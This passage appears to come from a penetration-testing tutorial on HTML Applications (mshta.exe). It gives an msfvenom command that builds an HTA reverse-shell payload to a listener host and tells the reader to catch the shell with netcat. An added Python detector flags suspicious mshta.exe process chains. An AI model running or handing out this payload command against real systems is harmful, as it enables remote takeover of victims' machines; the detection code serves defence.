HTA

HTML Applications (HTAs) are another great way to exploit the end user when the target system runs the Windows operating system. HTAs are executed by the mshta.exe program in Windows.

Because an HTA can execute arbitrary applications when launched from IE, which clashes with the security boundaries of the browser, it is run outside the browser's security context by mshta.exe.

An HTA that invokes a reverse shell can be prepared using the following command:

sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=443 -f hta-psh -o reverseshell.hta

Don't forget to start netcat at your end to receive the reverse shell from the victim's system.
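
From the defender's side, an HTA run through mshta.exe shows up in process-creation telemetry. The following is an added example, not part of the original page: it flags that activity in Sysmon-style process-creation events. The field names, rule names and sample events are constructed, and it assumes the hta-psh output starts PowerShell as a child of mshta.exe.

```python
import ntpath
import re

BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# HTA loaded from a URL or from a user-writable drop location.
RISKY_SOURCE = re.compile(r"https?://|\\downloads\\|\\appdata\\local\\temp\\", re.I)

def exe(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path or "").lower()

def classify(event):
    """Return the names of the rules a process-creation event matches."""
    image, parent = exe(event.get("Image")), exe(event.get("ParentImage"))
    cmdline = event.get("CommandLine") or ""
    hits = []
    if image == "mshta.exe":
        if parent in BROWSERS:
            hits.append("mshta_started_by_browser")
        if RISKY_SOURCE.search(cmdline):
            hits.append("mshta_risky_hta_source")
    if parent == "mshta.exe" and image in INTERPRETERS:
        hits.append("mshta_spawned_interpreter")
    return hits

def detect(events):
    """Return (index, rules) for every event that matches at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]

# Constructed sample events (assumed Sysmon Event ID 1 style fields).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Users\alice\Downloads\reverseshell.hta"',
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -e <base64 elided>",
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",  # locally installed HTA, not flagged
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for idx, rules in detect(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["Image"], rules)
```

The third sample event is an HTA launched from an installed location by explorer.exe and matches no rule, which is the kind of baseline to check before alerting on every mshta.exe start.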
